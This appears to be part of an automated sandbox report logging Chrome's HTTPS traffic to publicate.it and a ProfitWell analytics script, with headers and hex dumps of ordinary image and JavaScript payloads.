                                                                                                                                                                                                        Data Ascii: GNw4mTxoaFAcFkhgXATxF5Ab5m++SvTT2mNRPGhWjnd9yP3HZJ572s3ZqcT54ZVLVKfFdnbGRxftT/KrkFjleHCsRUggcQ2dBR8sEC5NZJVH6odB6P5UNUD7Hq678wpvhQLnvhXt8maJ3oHF6UmX+tV83oxpp7uu3mPWnx4VG2Folb580CgVgIkkFpJc52aCNTqAKeT031nZWT5Fw/LhUv31KR+Q11ET/fdpFojYxultEVMFGNBQ12X7yFAAuEe
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 30 43 4a 42 43 37 34 6b 46 70 68 69 45 77 65 4d 44 5a 35 48 47 79 74 54 6a 35 55 47 2f 39 4d 72 62 52 6c 7a 6e 71 31 4d 45 66 47 6a 78 72 5a 4e 4d 44 4c 62 4b 6e 4d 36 38 32 68 36 51 56 4d 6f 7a 62 4e 42 46 50 49 59 45 6b 49 73 7a 75 56 62 4a 79 77 4e 6e 34 63 62 4a 54 55 37 4a 2b 35 58 53 35 53 72 56 47 74 71 6f 64 68 72 76 55 79 59 64 52 54 76 63 31 4f 52 5a 30 36 39 73 61 35 61 6a 71 53 61 74 32 2f 64 79 37 51 35 4e 52 49 78 4a 49 4d 75 4c 73 62 43 31 74 57 6e 79 6f 70 37 39 75 58 44 56 64 74 6d 7a 4c 53 38 65 68 51 6d 6e 51 75 63 70 44 49 32 4a 36 4c 4f 67 76 62 35 30 6f 48 59 63 4c 6b 52 77 4e 37 4f 78 4e 36 6e 44 46 53 43 41 4f 42 7a 63 70 56 64 4f 74 6b 54 46 31 76 74 69 77 76 31 51 74 64 72 73 31 4f 52 61 6b 70 2f 66 4f 55 51 64 6c 35 66 4a 4a 75
                                                                                                                                                                                                        Data Ascii: 0CJBC74kFphiEweMDZ5HGytTj5UG/9MrbRlznq1MEfGjxrZNMDLbKnM682h6QVMozbNBFPIYEkIszuVbJywNn4cbJTU7J+5XS5SrVGtqodhrvUyYdRTvc1ORZ069sa5ajqSat2/dy7Q5NRIxJIMuLsbC1tWnyop79uXDVdtmzLS8ehQmnQucpDI2J6LOgvb50oHYcLkRwN7OxN6nDFSCAOBzcpVdOtkTF1vtiwv1Qtdrs1ORakp/fOUQdl5fJJu
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 36 45 55 39 79 58 6f 41 45 34 6e 79 49 71 65 42 49 42 63 70 4a 77 73 53 43 42 7a 30 39 74 37 74 48 53 6f 73 43 48 2f 37 6b 5a 48 6e 58 6c 62 56 76 64 5a 54 64 46 71 6f 75 76 56 37 56 66 61 5a 50 52 6f 77 79 59 5a 61 76 78 35 2f 78 45 53 43 42 78 43 64 57 6c 44 51 42 41 72 72 56 6f 55 2f 38 32 36 38 47 79 6e 55 33 32 51 59 31 50 58 65 75 32 6a 37 64 78 45 4e 33 57 2b 6d 57 52 79 6c 35 71 4a 6c 6c 65 6a 45 6d 44 77 51 71 42 62 67 6a 4b 6a 58 34 4f 77 49 47 42 51 59 76 43 74 54 54 63 30 30 6c 44 37 32 53 66 74 47 79 64 75 6c 57 59 30 47 36 35 55 48 79 4d 48 68 6a 57 48 78 70 4d 2f 2b 30 73 52 69 45 6f 69 46 51 61 77 47 39 4b 44 43 6e 46 67 57 57 57 78 31 36 55 57 43 74 31 6e 55 4d 56 56 65 39 73 50 4b 6f 6d 6f 32 6d 56 39 4b 58 5a 35 63 4e 39 54 79 2b 68 77
                                                                                                                                                                                                        Data Ascii: 6EU9yXoAE4nyIqeBIBcpJwsSCBz09t7tHSosCH/7kZHnXlbVvdZTdFqouvV7VfaZPRowyYZavx5/xESCBxCdWlDQBArrVoU/8268GynU32QY1PXeu2j7dxEN3W+mWRyl5qJllejEmDwQqBbgjKjX4OwIGBQYvCtTTc00lD72SftGydulWY0G65UHyMHhjWHxpM/+0sRiEoiFQawG9KDCnFgWWWx16UWCt1nUMVVe9sPKomo2mV9KXZ5cN9Ty+hw


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        124192.168.2.549911104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC712OUTGET /images/features_review_icon.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 5606
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "15e6-620aa1d25b530"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xPMkO04%2FciZR3C11mVVsvcrBwdEyiOHwnBLK56GlG7TY4u8vzYXABpzUS7MqTSsSSdTMWjbr%2Bpl4gOPaTATWijSFLdRmp5siIYKLAGO2BpTaEjGE6YdiQ5AVjXlFTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d7bf4f41e6-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC625INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 2a 08 06 00 00 00 f6 d4 14 17 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 00 c8 a0 03 00 04 00 00 00 01 00 00 00 2a 00 00 00 00 ea 87 8b 10 00 00 15 59 49 44 41 54 78 01 ed 9d 07 90 5c f5 79 c0 bf bd de fb 9d 4e ba d3 a9 9c 1a 48 a8 20 09 90 90 90 45 97 1d 44 2c 43 70 42 b0 c7 f1 24 0e b1 13 12 db 99 90 64 12 9b 89 13 32 61 86 d8 1e e3 d8 10 12 40 60 03 06 83 b0 69 c2 12 42 48 20 81 84 ea a9 5d af 3a 5d ef bd e4 f7 fd f7 f6 6e b5 da dd db 77 b7 2b bd cc ec a7 d1 6d 7d ff f7 bd af b7 ff 5b 91 30 84 29 10 a6 80 4f 0a 38 7a 47 07 37 9f ed 6a f2 f9 85
                                                                                                                                                                                                        Data Ascii: PNGIHDR*gAMAa8eXIfMM*i*YIDATx\yNH ED,CpB$d2a@`iBH ]:]nw+m}[0)O8zG7j
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 98 02 61 0a 8c 51 c0 dd 10 86 89 12 a6 40 98 02 1e 14 08 2b 88 07 41 c2 2f c3 14 70 a7 40 d0 14 24 82 0a 4e 52 44 34 6b db 25 86 74 bf 4c e7 f3 44 0a 11 51 76 c9 63 2e 45 4f e2 a8 da c5 69 ae 60 53 88 84 c7 4a 43 3b 83 ca a0 ca 62 b0 20 68 0a 92 16 15 2b b7 67 cd 97 18 8f 04 3b 58 88 06 63 9d 5b 32 e6 c9 8c 98 44 96 1a 09 c6 72 c1 5d 63 64 44 56 a5 cc 90 6b 53 e8 ff 50 f6 b4 1f 8c 48 2e a5 ed 5b 32 e7 db d6 04 c6 60 5c 54 06 d3 a9 82 06 0b 82 a3 20 30 b4 30 3e 53 1e 9e b7 49 d2 a3 15 39 fb 09 60 02 96 ef bb f3 6f 92 95 2a 80 08 a3 dd c0 01 cd be 3c 73 a5 dc 97 bb 5c 1c f4 31 6c 07 d0 6c 45 72 ae 7c 77 ee 06 49 88 8a b1 1d 7a 58 15 49 43 31 fe 7e fe 26 99 1f 9f 11 34 23 13 24 05 11 d9 98 51 20 6b 33 e6 c8 75 c9 b3 10 40 9b 31 98 06 94 32 77 5d fa 1c d9 9c
                                                                                                                                                                                                        Data Ascii: aQ@+A/p@$NRD4k%tLDQvc.EOi`SJC;b h+g;Xc[2Dr]cdDVkSPH.[2`\T 00>SI9`o*<s\1llEr|wIzXIC1~&4#$Q k3u@12w]
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 2b 38 cc 0e b9 dd cd e5 58 99 14 d9 36 f3 1a 29 40 18 ad c0 3c ac b6 fe f7 06 45 9d f5 f2 7e 4b 99 7c d8 56 e5 f4 1e de be 34 c9 7b fd 58 94 03 6d d5 32 0b fc ee cb 5b 21 6b d3 66 fb 64 94 b7 a5 32 50 aa 9b 70 c3 de e0 42 7f a7 bc 79 e1 b4 fc ae a9 44 ea 06 bb f8 8a 77 25 f7 76 ac eb 3d 15 d8 d3 dd cd f2 1e d7 99 8b 22 de 9c b9 00 4b a8 a3 38 81 81 1a a5 1b b4 9e ef 05 fa d8 3f a1 ca bb 8b b5 4f 75 35 5b 57 0e b3 66 84 9c 1f e8 94 5d 4d a5 d0 30 55 b6 e6 5e 2d b9 5a 7d 0c 18 1c b2 74 ac f0 e1 79 88 2a d5 67 ec 41 d9 77 a1 4a 3e 6e af 16 e5 d5 54 40 f7 89 ec 6b ad 92 7c 64 6f 1b 21 e7 72 12 71 2b a0 5e c5 d3 b3 b8 8e af e9 6d 93 d7 30 d0 bb a1 61 13 1b de 7c 69 88 0f 05 11 c2 82 51 39 d4 51 27 d5 7d ed 58 d1 16 f9 4a de b5 b2 3a 2d df a7 a5 71 9d d8 df 63
                                                                                                                                                                                                        Data Ascii: +8X6)@<E~K|V4{Xm2[!kfd2PpByDw%v="K8?Ou5[Wf]M0U^-Z}ty*gAwJ>nT@k|do!rq+^m0a|iQ9Q'}XJ:-qc
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 81 ce 8e 89 97 26 12 fe 61 92 ea cb 05 4b e8 ec cf 1a bb af 96 e7 39 3b a8 fa a8 f2 6e 27 a4 3a 42 68 9b 4c c5 4d 13 67 cd 07 2f 0b c0 e3 8c 98 38 2a 97 f9 5e 4f 37 88 02 1d a2 f8 f0 32 85 16 ad d2 69 33 55 fb 7a f5 da eb b0 08 d6 15 04 bb a7 0d a2 6c 36 cf 78 42 07 56 f9 bd e6 62 39 4e 1c bf 3a 75 16 b9 ca 0a 6a d4 a9 f2 6f 25 7b 48 8c 3e c3 42 4f e1 74 9e 27 99 ec 35 4c 5a c5 58 c4 f5 94 7d 3d 61 98 b1 8e 03 ed 55 f2 3e 49 78 06 4a ab 61 e2 1c 92 bd 0f 5b ca e5 5b a7 7e 1b 7a eb a7 08 c1 ac 8c 98 64 53 b6 f4 56 2d 2a 21 87 7a d3 58 ef 7e f9 fa ec b5 a6 54 3e 48 b7 f8 9e a3 2f 4a c3 24 15 17 cf eb 9d ce eb 3f a4 bf 94 6a f6 f6 5c bc 4a 33 56 f9 1d 0c cb b9 de 26 fa 5c 0b e4 2f e6 5c cf 26 b4 24 79 b0 68 07 d5 ab b2 cb c6 e3 3b 33 af f1 5a 66 1e 20 5f de
                                                                                                                                                                                                        Data Ascii: &aK9;n':BhLMg/8*^O72i3Uzl6xBVb9N:ujo%{H>BOt'5LZX}=aU>IxJa[[~zdSV-*!zX~T>H/J$?j\J3V&\/\&$yh;3Zf _
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC874INData Raw: 53 fd 54 43 4e bd 2b c8 31 bc c5 a3 a5 7b 48 26 cb a4 c5 54 f7 3c 4f e8 20 5f 13 29 56 43 43 df a9 98 fe c7 3f 16 6e c6 7b cf 33 d5 23 15 80 90 00 0b af 4b cd 37 9e ed 9f 29 7f 6b 69 b4 96 90 6a c4 f0 eb 62 1c d5 e0 d4 0d 76 e3 75 4f 48 39 3c fe 07 6e 88 b1 81 ca 5c 6a 54 3c 23 36 60 1f 22 1e e7 93 78 2f 63 b8 f3 67 28 c6 13 18 e1 62 06 0d 9d b3 5e 17 e3 a7 4c 6c c7 70 ab a1 d1 be 53 0d 7d 27 2d 2e 2d a5 3a a7 4d e5 40 99 6c 49 41 f4 76 2a 0f 43 38 ad 02 35 90 4c fa 3f 89 43 fa 68 1a 1d 25 27 f9 a7 73 bb cc 5e f0 2c 94 ab 5e 2d 74 88 24 50 a7 7a 5f 20 4e 7e 8f 70 a0 1c eb eb 1c d3 f7 24 9c 4b b4 9c bb aa 2b 68 3c fd b4 f2 a0 19 79 36 c3 84 58 a8 d0 80 6e 2e 8b c1 2b b4 ca 5f 9e 7a 43 8e 43 97 3e 42 ac c9 04 49 ef 1c ff 46 c3 69 18 dc 2e d7 20 18 ba 09 a8
                                                                                                                                                                                                        Data Ascii: STCN+1{H&T<O _)VCC?n{3#K7)kijbvuOH9<n\jT<#6`"x/cg(b^LlpS}'-.-:M@lIAv*C85L?Ch%'s^,^-t$Pz_ N~p$K+h<y6Xn.+_zCC>BIFi.


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        125192.168.2.54991318.239.83.614436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC399OUTGET /js/profitwell.js?auth=c61691493c428b337ecf0f72fa2f9c82 HTTP/1.1
                                                                                                                                                                                                        Host: public.profitwell.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC580INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 35585
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Tue, 09 Jul 2024 13:11:16 GMT
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        x-amz-version-id: JMGvWLo2AcS0vj3xea6qA74DPu3IPDGF
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:28 GMT
                                                                                                                                                                                                        ETag: "37633505b47eda9da0bd471c2816b38b"
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                        Via: 1.1 416dae0837568c2bb7cea7ae5c6bba22.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: 00Y4YJSMGGXTffFMv5ey6glEmuDSICPDtyIoUFagHIq_CYPDM2NeZA==
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC15804INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 61 63 6b 41 6e 6f 6e 79 6d 6f 75 73 43 75 73 74 6f 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 41 6e 6f 6e 79 6d 6f 75 73 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 2c 74 7d 28 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 28 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 26 26 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                        Data Ascii: !function(){"use strict";var t=function(){function t(){}return t.prototype.trackAnonymousCustomer=function(){},t.prototype.getAnonymousId=function(){return null},t}(),e=function(t,r){return(e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC186INData Raw: 69 2e 73 65 6e 74 28 29 2c 76 6f 69 64 20 30 21 3d 3d 74 26 26 74 68 69 73 2e 6d 65 73 73 61 67 65 53 65 72 76 69 63 65 2e 61 64 64 4f 6e 65 54 69 6d 65 4c 69 73 74 65 6e 65 72 28 22 63 72 65 64 69 74 43 61 72 64 53 75 62 6d 69 74 74 65 64 22 2c 74 29 2c 74 68 69 73 2e 77 69 64 67 65 74 53 65 72 76 69 63 65 2e 6c 6f 61 64 53 61 6d 65 4f 72 69 67 69 6e 49 46 72 61 6d 65 28 6f 2c 74 29 2c 5b 32 5d 7d 7d 29 29 7d 29 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 72 6d 50 6c 61 6e 55 70 67 72 61 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c
                                                                                                                                                                                                        Data Ascii: i.sent(),void 0!==t&&this.messageService.addOneTimeListener("creditCardSubmitted",t),this.widgetService.loadSameOriginIFrame(o,t),[2]}}))}))},t.prototype.confirmPlanUpgrade=function(t,e,
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC10857INData Raw: 72 29 7b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 73 77 69 74 63 68 28 69 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 69 2e 74 72 79 73 2e 70 75 73 68 28 5b 30 2c 32 2c 2c 33 5d 29 2c 6e 3d 74 68 69 73 2e 75 72 6c 42 75 69 6c 64 65 72 2e 62 75 69 6c 64 54 65 72 6d 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 43 6f 6e 66 69 72 6d 55 70 67 72 61 64 65 55 72 6c 28 74 29 2c 5b 34 2c 74 68 69 73 2e 72 65 71 75 65 73 74 73 2e 70 6f 73 74 55 72 6c 45 6e 63 6f 64 65 64 28 6e 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 6f 3d 69 2e 73 65 6e 74 28 29 2c 65 28
                                                                                                                                                                                                        Data Ascii: r){return n(this,void 0,void 0,(function(){var n,o,s;return i(this,(function(i){switch(i.label){case 0:return i.trys.push([0,2,,3]),n=this.urlBuilder.buildTermOptimizationConfirmUpgradeUrl(t),[4,this.requests.postUrlEncoded(n)];case 1:return o=i.sent(),e(
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC8738INData Raw: 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 77 2d 61 75 74 68 22 29 3b 65 26 26 74 68 69 73 2e 73 65 74 41 75 74 68 54 6f 6b 65 6e 28 65 29 7d 2c 74 7d 28 29 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 74 68 69 73 2e 61 75 74 68 54 6f 6b 65 6e 3d 22 22 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 41 75 74 68 54 6f 6b 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 54 6f 6b 65 6e 56 61 6c 69 64 28 74 29 3f 28 74 68 69 73 2e 61 75 74 68 54 6f 6b 65 6e 3d 74 2c 21 30 29 3a 28 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 49 6e 76 61 6c 69 64 20 74 6f 6b 65 6e 20 22 27 2b 74 2b 27 22 20 61 74 74 65 6d 70 74 65 64 20 74 6f 20 62 65 20 73 65 74 27 29 2c 21 31 29
                                                                                                                                                                                                        Data Ascii: ttribute("data-pw-auth");e&&this.setAuthToken(e)},t}(),S=function(){function t(){this.authToken=""}return t.prototype.setAuthToken=function(t){return this.isTokenValid(t)?(this.authToken=t,!0):(console.warn('Invalid token "'+t+'" attempted to be set'),!1)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        126192.168.2.549915104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC704OUTGET /images/more_clients.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:27 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 4062
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "fde-620aa1d25f3b1"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FOLTAM2DnFPUTzcBcuT7dZTwbWKjDAQxmXPM2KKQfaRyBd2F%2FbfitJIUYKBBeswttPKDYYH4QxOhFtW3Likl4szU4y%2Fsz%2FgsfmvSwk%2F%2FEXC0LntSCVIHJ3%2FVUixhcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615db1f2d728a-EWR
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC614INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 38 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 30 37 33 31 37 30 37 2c 30 20 4c 31 30 37
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>8</title> <defs> <path d="M10.0731707,0 L107
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 65 72 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74
                                                                                                                                                                                                        Data Ascii: er-2"> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur st
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 65 72 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 32 38 35 30 30 38 38 2c 33 31 2e 33 38 36 34 33 30 37 20 43 39 2e 30 32 32 31 32 39 34 33 2c 33 31 2e 33 38 36 34 33 30 37 20 37 2e 30 37 35 31 37 31 35 33 2c 33 30 2e 39 38 39 36 39 32 31 20 35 2e 34 34 34 31 33 35 31 2c 33 30 2e 31 39 36 32 31 34 39 20 43 33 2e 38 31 33 30 39 38 36 38 2c 32 39 2e 34 30 32 37 33 37 38 20 32 2e 35 33 34 37 31 38 37 37 2c 32 38 2e 33 30 38 30 33 33 31 20 31 2e 36 30 38 39 39 35 33 39 2c 32 36 2e 39 31 32 31 30 31 31 20 43 30 2e 36 38 33 32 37 32 30 31 37 2c 32 35 2e 35 31 36 31 36 39 20 30 2e 31 34 36 39 34 30 32 31 39 2c 32 33 2e 39 33 36 35 36 31 36 20 30 2c 32 32 2e 31 37 33 32 37 39 20 4c 35
                                                                                                                                                                                                        Data Ascii: ero"> <path d="M11.2850088,31.3864307 C9.02212943,31.3864307 7.07517153,30.9896921 5.4441351,30.1962149 C3.81309868,29.4027378 2.53471877,28.3080331 1.60899539,26.9121011 C0.683272017,25.516169 0.146940219,23.9365616 0,22.173279 L5
